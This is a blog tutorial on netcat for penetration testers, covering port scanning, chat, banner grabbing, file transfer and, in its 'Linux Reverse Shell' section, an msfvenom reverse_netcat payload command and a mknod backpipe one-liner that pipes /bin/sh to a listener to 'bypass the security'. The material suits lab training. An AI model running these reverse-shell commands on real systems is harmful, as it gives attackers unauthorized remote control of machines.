Netcat techniques for penetration testers

Hacking Truth
0


Netcat techniques for penetration testers


Netcat techniques for penetration testers 


After a long time we are back, Yes! we are back and now we have brought it for you a new blog about netcat for penetration tester or else. Netcat a techniques for penetration testers. Netcat technically use as a "nc" - is a network utility that uses the TCP and UDP connections in order to read and write a network. It can be used by security auditors and attackers. Its depend upon for which purpose you want to use this netcat.

It acts as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services.



Netcat Basic Command


Help or sometimes its "h" this single alphabet drops out for every possible options that a tool can do for us. So, lets start with the first command for us help command.


nc -h 



Netcat techniques for penetration testers



Port Scanning


Now we will work with port scanning with netcat. although it was not designed to function as. To make it worth as a scanner, we need to set the "-z"  flag, which tells netcat, to scan listing daemon without sending any data. This makes it possible to understand the types of services that is running on that specific port.


nc -v -n -z 192.168.19.100 21-100 


[-v] -  indicates 

IP might be changed, you can put your own system IP


Netcat techniques for penetration testers




Chatting


Netcat can also be used to chat between two users but before that we need to establish the connection. To set up this all, we'll be using two devices - one will play the role as an initiator and the other one will be a listener. 

You can use with two different users operating system communicate with each other over a netcat establish connection within the same network but now at this time we will using same system terminal.


nc -lvp 4444


Here,

[l] - listen mode

[v] - Verbose mode

[p] - Local port


Now its time to set up an initiator.


nc 192.168.19.100 4444


From the below you can see that connection has been setup and both are now able to communicate with each other.


Netcat techniques for penetration testers



Netcat techniques for penetration testers



Banner Grabbing


Banner refers to a text message received from the host with information about the open ports and services along with their version numbers

Run the following command to grab the information


nc 192.168.19.100 22



Netcat techniques for penetration testers



File Transfer


Netcat techniques for penetration testers




Netcat offers us an opportunity to transfer files from one device to another over a network. Let's follow the scenario, where a kali users exempts to transfer his files to a user at an linux machine


From the below image and line of command over the kali machine sets up a listener at port number 4444, and shares fileone.txt  "<" parameter.


nc -lvp 4444 < fileone.txt




and you can see that the linux user has successfully grabbed the fileone.txt file from 192.168.19.100 which is nothing but kali user's IP.



Linux Reverse Shell


As earlier discuss netcat can perform anything, so now will be exploit the target's machine with the help of "msfvenom" to create a payload and will set up a netcat listener to grab a session.


msfvenom -p cmd/unix/reverse_netcat lhost=192.168.19.100 lport=4444 R


The "R" flag is used to generate a raw payload which will be over our screen.


Netcat techniques for penetration testers


From the above image you can see that our payload  is ready. Now its time to trigger  it over victim's server.

Open the another machine if you have otherwise we will use in same machine but another terminal screen and type this payload in the terminal. Before firing it up. get back to the attacker's machine (kali linux) and setup the netcat listener over there by using the same port number that you used while generating the payload.



from the below image you can see that, as soon as the victim runs the payload, we'll get the session.

There are many times when the security gets high and we fail to grab the session using this method, but there is another way to get a reverse shell.

Before that set up a listener at port 443.

Netcat techniques for penetration testers



as the listener boots in just execute the commands in the target's machine :

This help you to the bypass the security and offer you a netcat session.

mknod /tmp/backpipe p


/bin/sh 0</tmp/backpipe | nc 192.168.19.100 4444  1>/tmp/backpipe



Netcat techniques for penetration testers



Randomized Port


There are chances when we aren't able to decide the very own port to setup a listener or to establish a netcat connection. Well netcat has a special "-r" flag which will provide us with the randomized local port.


nc -lv -r


Netcat techniques for penetration testers


from the above image you can see that our listener has been started at 45811.



Grabbing the HTTP Banner


HTTP banner are now can't be fetched easily, as they contain the server's information. But we can use netcat to capture information about any webserver.

Simply run the following command in order to manipulate  the target's server and check what we have grabbed.


printf "GET / HTTP/1.0\r\n\r\n" | nc 192.168.19.100 80 



Netcat techniques for penetration testers



Great! from the above image you can see that I've successfully captured the HTTP banner and we are presented with the apache server.



 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

 

 

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.
Post a Comment (0)
Our website uses cookies to enhance your experience. Learn More
Accept !